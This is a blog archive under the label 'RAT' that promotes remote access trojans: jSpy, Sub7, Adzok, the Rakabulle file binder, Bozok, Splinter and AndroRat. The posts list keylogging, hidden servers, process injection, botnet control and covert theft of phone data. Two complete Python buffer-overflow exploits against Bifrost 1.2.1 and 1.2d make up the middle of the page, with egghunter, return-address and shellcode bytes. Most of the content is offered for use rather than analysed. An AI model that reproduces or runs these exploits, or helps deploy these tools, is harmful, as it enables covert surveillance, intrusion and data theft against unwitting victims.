Showing posts with label RAT. Show all posts

Thursday, 13 March 2014

[Jspy RAT v0.08] Java Multiplatform Remote Administration Tool

jSpy is a RAT developed in Java. Need to monitor your children's internet use? Check that your workers are doing what you paid them for? Help a friend out with a problem on his computer? No worries, whether it be Windows or Mac OSX that you need to manage, or manage from - jSpy is the answer.

Stable

jSpy uses a library called KryoNet developed by Esoteric Software. By using this library for networking, jSpy creates an environment where you can rest assured you won't lose your clients.

Powerful

jSpy has an abundance of features, and is actively developed by a 17 year old Java programmer from London. If you have any suggestions please email me at: javastealth@gmail.com

Multiple OS Support

jSpy will run on Windows, Mac OSX and Linux. jSpy was developed on a Mac ensuring that all features work on both UNIX and DOS Systems.

Tuesday, 4 February 2014

[Sub7 v0.5] Remote Administration Tool


This is the Newest Sub7 Remote Administration Tool. The Official Releases can only be found @ www.sub-7.org

Submitted by Diabl0
Password Mirror:www.sub-7.org

Wednesday, 22 January 2014

[Adzok] Remote Administrator made in Java


Adzok Free is based on Adzok Open; it is the edition that will continue the development of Adzok Open. Adzok Free will be closed source but free of charge.

Client Features

- Remote Desktop.
- Remote Shell.
- Upload and Download Files.
- Keylogger Online.
- Send Messages.
- Load and Run Script.
- Information System.
- Send Keys.
- Clipboard.
- Fun (Restart, Shutdown, Visit WebSite, Execute Command Shell, etc).

- Listens on 3 ports.
- Information is sent and data is transferred over only 1 port.
- No installation needed, but the machine must have Java installed.
- Reverse connection system.
- A download folder for each user.
- Operating system independent: in theory it can run on any operating system that has Java installed.
- Server generator.
- Server uninstaller.

Server Features


Optimized for: Windows XP, Windows Vista, Windows 7.
  • Keylogger is only available on all versions of Windows (32 and 64 bit).
- A single server for all operating systems.
- No installation needed, but the machine must have Java installed.
- Mutex (prevents the server from running twice), but it will continue to show your company's image while the server stays invisible to the user.
- Server size: 54 KB (uncompressed).


[Rakabulle] Advance File Binder from DarkComet RAT Developer


File binder is an application that allows a user to bind multiple files together, resulting in a single executable file. When you execute that single application, all previous merged files will be extracted to a temporary location, and will be executed normally.
"The builder Rakabulle application will create a stub and inject in its resource the target files to extract and execute. The stub is the little generated part of the program which is designed to extract from its resource the target files to a temporary location and execute. In our application the stub also got a part to inject in Explorer or Internet Explorer process and load custom made plugins.

Listed features are:
  • File binder, auto file extractor and executor.
  • REM (Remote Code Execution), Execute code (Plugins) in target process (Explorer or Internet Explorer)
  • Support 32 and 64 Process.
  • The application is a 32bit Application (Soon we will compile the 64bit version)
  • Support UPX compression for the stub (Without compression stub size is about 38KiB using pure Windows API no extra libraries; with compression stub size is approximately 16KiB). The UPX compression doesn’t change the way the application works, only the final size.
  • Support Windows startup.
  • Doesn’t require administrative privileges.
  • Plugins and File list support drag and drop.
  • Support plugins with an open source example.
  • The stub and the builder are coded using Unicode encoding.

Tuesday, 31 December 2013

Bozok RAT 1.5



After ~2 months I am proud to announce that Bozok reached version 1.5. In this version I tried to fix all reported bugs and implement audiocapture which many people asked for.
Changelog:
-added russian
-added korean
-fixed webcam device list bug
-fixed DEP problem on webcam/screen
-handshake bug fixed
-plugin loading bug fixed
-installation to system32 tweaked
-audiocapture added

Wednesday, 4 December 2013

[Splinter] RAT open source


Splinter The Rat is a RAT (Remote Administration Tool). This kind of tool normally lets us take control of a bot (a compromised system).

Splinter The Rat acts as the BotMaster, or botnet controller, and is designed to work with different kinds of backdoors: netcat listeners or implants written in Java or Python, already precompiled on the system. In the future it will also integrate with Armitage and Raven.

This RAT also supports file transfer and browsing, geolocation, access to and/or modification of the victim's clipboard, screenshots and recording, etc.

Splinter The RAT is an educational project from which we can learn how to build tools of this kind, which are also fully functional. According to its authors, its goal is to show how easy it is to create such a tool.

This project is under active development, and some of the features we can expect in future versions are:
  • Development of implants in Python, PowerShell and C++.
  • Steganography, TCP/DNS tunneling.
  • Drive-by downloaders and JavaScript droppers
  • Creation of polymorphic implants and encryption of the payloads' communication
  • Scanning of internal networks
  • Exploitation of mobile devices
  • Etc.
If you have ever thought about creating the infrastructure behind a botnet, here is a good example for creating your own or building on top of this one.

Sunday, 24 November 2013

[Exploit] Bifrost 1.2.1 and 1.2d - Remote Buffer OverFlow



Bifrost 1.2.1 - Remote Buffer OverFlow
#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import sys

def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))

    return ''.join(out)

def bif_len(s):
    while len(s)<8:
        s=s+"00"
    return s

def header(s):
    a=(s[0]+s[1]).decode("hex")
    a+=(s[2]+s[3]).decode("hex")
    a+=(s[4]+s[5]).decode("hex")
    a+=(s[5]+s[6]).decode("hex")
    return a

def random():
    a=""
    for i in range(0,8):
        a+="A"*1000+"|"
    return a

def usage():

    print "\n\n\t***************************"
    print "\t* By : Mohamed Clay *"
    print "\t* Bifrost 1.2.1 Exploit *"
    print "\t***************************\n"
    print "\t Usage : ./bifrost1.2.1 host port"
    print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"


if len(sys.argv)!=3:
    usage()
    exit()

HOST=sys.argv[1]
PORT=int(sys.argv[2])

key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"

xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll

egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

#calc.exe shellcode (badchars "\x00")

buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"


raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30

tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"

Bifrost 1.2d - Remote Buffer Overflow

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import threading
import sys

def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))

    return ''.join(out)

def bif_len(s):
    while len(s)<8:
        s=s+"00"
    return s

def header(s):
    a=(s[0]+s[1]).decode("hex")
    a+=(s[2]+s[3]).decode("hex")
    a+=(s[4]+s[5]).decode("hex")
    a+=(s[5]+s[6]).decode("hex")
    return a

def random():
    a=""
    for i in range(0,8):
        a+="A"*1000+"|"
    return a


def exploit():
    s.sendall(out)

def usage():

    print "\n\n\t***************************"
    print "\t* By : Mohamed Clay *"
    print "\t* Bifrost 1.2d Exploit *"
    print "\t***************************\n"
    print "\t Usage : ./bifrost1.2.1 host port"
    print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"


if len(sys.argv)!=3:
    usage()
    exit()

HOST=sys.argv[1]
PORT=int(sys.argv[2])

key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"

xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll

egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

#calc.exe shellcode (badchars "\x00")

buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"


raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30


tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*12+eip+"A"*8+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out


data2="2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:\|C:\|C:\|MA|00000000|BifrosT v1.2d|"
out2=rc4crypt(data2,key)
l=header(bif_len(str(hex(len(data2))).split("0x")[1]))
out2=l+out2

th = threading.Thread(name='exploit', target=exploit)
th.setDaemon(True)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out2)
th.start()
s.recv(1024)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"


Saturday, 26 October 2013

Bozok RAT 1.4.3



Changelog:
-fixed socket timeout bug
-fixed small translation bugs
-added spanish/arabic/bulgarian/polish/french translation
-added "Test Connection" in builder


Sunday, 2 June 2013

[AndroRat] Remote Administration Tool for Android


Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
The name Androrat is a mix of Android and RAT (Remote Access Tool).
It was developed by a team of 4 for a university project and was completed in one month. The goal of the application is to give remote control of the Android system and retrieve information from it.

Technical matters

  • The Android application is the client for the server, which receives all the connections.
  • The Android application runs as a service (not an activity) that is started during boot, so the user does not need to interact with the service (even though there is a debug activity that allows configuring the IP and the port to connect to).
  • The connection to the server can be triggered by an SMS or a call (this can be configured).

The available functionalities are:

  • Get contacts (and all their information)
  • Get call logs
  • Get all messages
  • Location by GPS/Network
  • Monitor received messages live
  • Monitor phone state live (call received, call sent, call missed...)
  • Take a picture from the camera
  • Stream sound from the microphone (or other sources...)
  • Stream video (for activity-based client only)
  • Show a toast
  • Send a text message
  • Place a call
  • Open a URL in the default browser
  • Vibrate the phone

Folders

The project contains the following folders:
  • doc: Will soon contain all the documentation about the project
  • Experiment: Contains an experimental version of the client built around an activity, which also allows streaming video
  • src/Androrat: Contains the source code of the client that should be put on the Android platform
  • src/AndroratServer: Contains the sources of the Java/Swing server that can be run on any platform
  • src/api: Contains all the different APIs used in the project (JMapViewer for the map, forms for Swing, and vlcj for video streaming)
  • src/InOut: Contains the code common to the client and the server, which is basically the protocol implementation